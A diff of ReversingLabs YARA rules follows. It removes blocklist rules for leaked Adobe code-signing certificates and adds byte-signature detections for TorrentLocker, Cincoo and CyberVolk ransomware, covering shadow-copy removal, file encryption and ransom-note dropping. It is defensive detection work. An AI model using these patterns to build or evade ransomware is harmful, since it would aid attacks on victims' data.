-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "35c4f46322da4f5b9f938c1098c8e57effc8abfc03db865190c343df7b8990ea"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$entry_point = {
+            68 ?? ?? 40 00 E8 ?? ?? ?? FF
+        }
+		$dump_instruction = {
+            8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
+            50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D
+            45 ?? 52 50 FF D3 50 FF 15
+        }
+		$extension_rule = {
+            8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ??
+            ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45
+            ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF
+            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ??
+            50 6A ?? 6A ?? 6A ?? FF 15
+        }
+		$instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "ca:ad:82:22:70:5d:3f:b3:43:0e:11:4a:31:c8:c6:a4" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $dump_instruction and $extension_rule and $instruction_string
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B191812516E6618D49E6Ccf5E63Dc343 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Torrentlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects TorrentLocker ransomware."
 		author = "ReversingLabs"
-		id = "8f316011-9a29-5366-a26a-1fe20651ef17"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "64bdb0db-ea0c-5a0d-9d3e-db1df86c132b"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1308-L1324"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "40c03e683b4b8e8a23ca84da7dfd3bd998d3708b27b7df7a22f25fb364c3a69b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.TorrentLocker.yara#L1-L98"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1aa523fa95e142b7e421286d26918e3da4bd3e268fef3f98f00820296291bfc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TorrentLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:91:81:25:16:e6:61:8d:49:e6:cc:f5:e6:3d:c3:43" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4Ba7Fb8Ee1Deff8F4A1525E1E0580057 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "af912c64-334d-51f5-8ca4-707fcec512ba"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1326-L1342"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "324157b9fec2653cb8874c7a1a5b6e39b121992cd52856b8c4a2a8b7cee86a69"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$tlocker_ep = {
+          68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 05 E8 ?? ?? ?? ?? 33 C0 C3
+      }
+		$tlocker_contact_server_1 = {
+          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
+          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
+          8B 4D ?? 8D 55 ?? 52 6A ?? BB ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 2C 01 00 00 8B BE
+          ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ?? 68
+          ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50 8D
+          4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56 FF
+          15 ?? ?? ?? ?? 8B 45 ?? 57 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ?? ??
+          56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ?? ??
+          ?? 8B 3D ?? ?? ?? ?? 56 FF D7 EB 06 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+          ?? ?? ?? FF 15 ?? ?? ?? ?? 53 8B F0 FF D7 85 F6 74 06 8B 55 ?? 52 FF D7 8B 75 ?? 8B 0D ?? ?? ?? ?? 33 C0 83 7D ?? ?? 56
+          0F 94 C0 6A ?? 51 8B F8 FF 15 ?? ?? ?? ?? 85 FF 75 10 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 9E FE FF FF 5F 5E 5B 8B E5 5D
+          C3
+      }
+		$tlocker_contact_server_2_1 = {
+          55 8B EC 83 EC ?? 8D 45 ?? 50 8D 4D ?? 51 B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 21 83 7D
+          ?? ?? 8B 45 ?? 75 05 8B 10 89 55 ?? 85 C0 74 0F 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 53 56 57 8D 9B ?? ?? ?? ??
+          8B 4D ?? 8D 55 ?? 52 6A ?? BF ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 E5 01 00 00 BF ??
+          ?? ?? ?? 39 3D ?? ?? ?? ?? 74 11 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B
+          9E ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 EB 00 00 00 6A ?? 68 ?? ?? ?? ??
+          68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 89 00 00 00 8D 45 ?? 50
+          8D 4D ?? 51 6A ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 16 81 4D ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 6A ?? 56
+          FF 15 ?? ?? ?? ?? 8B 45 ?? 53 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 38 6A ?? 8D 4D ?? 51 8D 55 ?? 52 68 ?? ?? ??
+          ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 10 81 7D ?? ?? ?? ?? ?? 75 07 C7 45 ?? ?? ??
+          ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 EB 06 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 57 C7 45 ?? ?? ?? ?? ?? C7 45 ??
+      }
+		$tlocker_contact_server_2_2 = {
+          ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B D8 FF D6 85 DB 74 06 8B 55 ?? 52 FF D6 8B 75 ?? 33 C0 83 7D ?? ?? 0F 94 C0 8B F8 85
+          FF 74 18 8B 0D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB 5E 8B 15 ?? ?? ?? ?? 3B 15 ?? ?? ?? ?? 75
+          34 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B D1 41 89 0D ?? ?? ?? ?? 85 D2 7E 71 8B 0D ?? ?? ?? ?? 3B C1 73 08 8B C8 89 0D
+          ?? ?? ?? ?? 2B C1 3D ?? ?? ?? ?? 72 1C A1 ?? ?? ?? ?? 40 83 F8 ?? 7E 05 A1 ?? ?? ?? ?? 8B C8 A3 ?? ?? ?? ?? E8 ?? ?? ??
+          ?? 81 3D ?? ?? ?? ?? ?? ?? ?? ?? 75 0B 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 85
+          FF 75 17 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 E5 FD FF FF A3 ?? ?? ?? ?? EB BF 5F 5E 5B 8B E5 5D C3
+      }
+		$tlocker_get_server_data = {
+          55 8B EC 83 EC ?? 56 57 33 FF 57 57 8D 45 ?? 50 53 33 F6 FF 15 ?? ?? ?? ?? 85 C0 74 77 8D 49 ?? 8B 4D ?? 03 CF 85 F6 75
+          73 33 C0 85 C9 74 0F 8B 15 ?? ?? ?? ?? 51 50 52 FF 15 ?? ?? ?? ?? 33 C9 85 C0 0F 95 C1 8B F0 8B C1 85 C0 74 33 8B 55 ??
+          8D 4D ?? 51 52 8D 04 37 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 1C 8B 45 ?? 85 C0 74 ?? 6A ?? 6A ?? 8D 4D ?? 51 53 03 F8 FF 15
+          ?? ?? ?? ?? 85 C0 75 A0 85 F6 74 10 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 33 C0 5E 8B E5 5D C3
+      }
+		$tlocker_remove_shadow_copies = {
+          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 57 6A ?? 33 FF 57 50 FF 15 ?? ?? ?? ?? 8B D8
+          3B DF 0F 84 DC 00 00 00 56 8D B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+          68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 5E B8 ?? ?? ?? ?? 8B D3 2B D0 0F B7 08 66 89 0C
+          02 83 C0 ?? 66 3B CF 75 F1 6A ?? 8D 95 ?? ?? ?? ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
+          51 8D 95 ?? ?? ?? ?? 52 57 68 ?? ?? ?? ?? 57 57 57 53 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 0F FF
+          15 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B F8 83 BD ?? ?? ?? ?? ?? 74 0B 8B B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53
+          6A ?? 50 FF 15 ?? ?? ?? ?? 5E 8B C7 5F 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 5F 33 CD B8 ?? ?? ?? ?? 5B
+          E8 ?? ?? ?? ?? 8B E5 5D C3
+      }
+		$tlocker_find_files = {
+          55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 0D ?? ?? ?? ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 F6 56 51
+          89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 AD 01 00 00 53 56 56 6A ?? 56 FF 15 ?? ?? ?? ??
+          85 C0 0F 88 89 01 00 00 68 ?? ?? ?? ?? 53 53 FF 15 ?? ?? ?? ?? 8B C3 8D 50 ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85
+          C9 75 F5 2B C2 D1 F8 8B F8 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 4D 01 00 00 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ??
+          ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 15 01 00 00 F6 85 ?? ?? ?? ?? ?? 0F 84 EC 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+          66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0
+          83 D8 ?? 85 C0 0F 84 AE 00 00 00 B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66
+          3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 74 74 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF
+          66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 03 C7 8D 44 00 ?? 85 C0 74 6C 50 A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
+          8B F0 85 F6 74 57 53 8D 4F ?? 51 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 56 56 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ??
+          ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 0A C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF
+          15 ?? ?? ?? ?? 85 C0 0F 85 EB FE FF FF 8B 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ??
+          ?? 8B 15 ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+      }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "4b:a7:fb:8e:e1:de:ff:8f:4a:15:25:e1:e0:58:00:57" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $tlocker_ep and $tlocker_get_server_data and $tlocker_remove_shadow_copies and $tlocker_find_files ) and ( $tlocker_contact_server_1 or ( $tlocker_contact_server_2_1 and $tlocker_contact_server_2_2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_2Df9F7Eb6Cdc5Ca243B33122E3941E25 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cincoo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Cincoo ransomware."
 		author = "ReversingLabs"
-		id = "da1895fd-ec29-513d-b8ae-2317f84b8280"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c7c2773c-5056-5127-8af7-7f5c5a8ea8a1"
+		date = "2022-06-21"
+		modified = "2022-06-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1344-L1360"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "703eccd5573fe42f03ec82887660d50e942156d840394746c90ba87d82507803"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Cincoo.yara#L1-L78"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6a7562cae90754ea75a9fb98ce73ebdb9acf1ad7f28f2240abe6cb592d717ca3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cincoo"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "2d:f9:f7:eb:6c:dc:5c:a2:43:b3:31:22:e3:94:1e:25" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_58A541D50F9E2Fab4380C6A2Ed433B82 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "19a26581-5c94-5c8d-8e3e-b2ef1d770968"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1362-L1378"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "69ddc58b6fec159d6eded8c78237a6a0626b1aedb58b0c9867b758fd09db46ad"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D
+            ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84
+            ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ??
+            ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 ?? ??
+            ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? 85 C0
+            75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 EC ?? 8B 45 ?? 53 8B D9 89 45 ?? B9 ?? ?? ?? ?? 8B C1 56 8B 53 ?? 2B C2
+            8B 75 ?? 89 55 ?? 57 3B C6 0F 82 ?? ?? ?? ?? 8B 7B ?? 8D 04 32 8B F0 89 45 ?? 83 CE
+            ?? 89 7D ?? 3B F1 76 ?? 8B F1 EB ?? 8B C7 D1 E8 2B C8 3B F9 76 ?? BE ?? ?? ?? ?? EB
+            ?? 03 C7 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 81 F9 ?? ?? ?? ??
+            72 ?? 8D 41 ?? 3B C1 0F 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B 55 ?? 8D 78 ?? 83 E7 ?? 89 47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 8B 55
+            ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 45 ?? 89 43 ?? 8B 45 ?? 89 73 ?? 8D 34 3A 03 C6 83
+            7D ?? ?? 89 45 ?? 52 72 ?? 8B 33 56 57 E8 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF 75 ?? 03
+            C7 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 41 C6 00 ?? 81 F9 ?? ?? ?? ?? 72 ??
+            8B 56 ?? 83 C1 ?? 2B F2 8D 46 ?? 83 F8 ?? 77 ?? 8B F2 51 56 E8 ?? ?? ?? ?? 83 C4 ??
+            89 3B 8B C3 5F 5E 5B 8B E5 5D C2 ?? ?? 53 57 E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 56 E8
+            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C6 00 ?? 8B C3 89 3B 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC CC CC 56 8B F1 FF 76 ?? E8 ?? ?? ?? ?? 8B
+            4E ?? 83 F9 ?? 72 ?? 8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83
+            C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ??
+            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 66 89 06 5E C3 E8 ?? ?? ?? ?? CC CC CC CC CC CC
+            8B 09 85 C9 74 ?? 8B 01 6A ?? FF 10 C3
+        }
+		$drop_ransom_note = {
+            52 51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 8D 4D ?? C6 46 ?? ??
+            E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D
+            4E ?? 50 E8 ?? ?? ?? ?? 81 CF ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ??
+            ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 83 F8 ??
+            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
+            04 0E 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 44 30 ?? ?? 8D 85 ?? ?? ?? ??
+            EB
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "58:a5:41:d5:0f:9e:2f:ab:43:80:c6:a2:ed:43:3b:82" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5F273626859Ae4Bc4Becbbeb71E2Ab2D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cybervolk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects CyberVolk ransomware."
 		author = "ReversingLabs"
-		id = "a80dcaba-73f9-51d0-a75a-b6348fd305c6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "4d8bf096-d5c9-5a77-99e6-2c66e480da36"
+		date = "2024-11-27"
+		modified = "2024-11-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1380-L1396"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c8be504f075041508f299b1df03d9cb9e58d9a89f49b7a926676033d18b108ba"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.CyberVolk.yara#L1-L293"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "59ed7c4f576fa7cd4cceb724d14f258598c140e434ed309fe2e599c3aaa667d9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CyberVolk"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
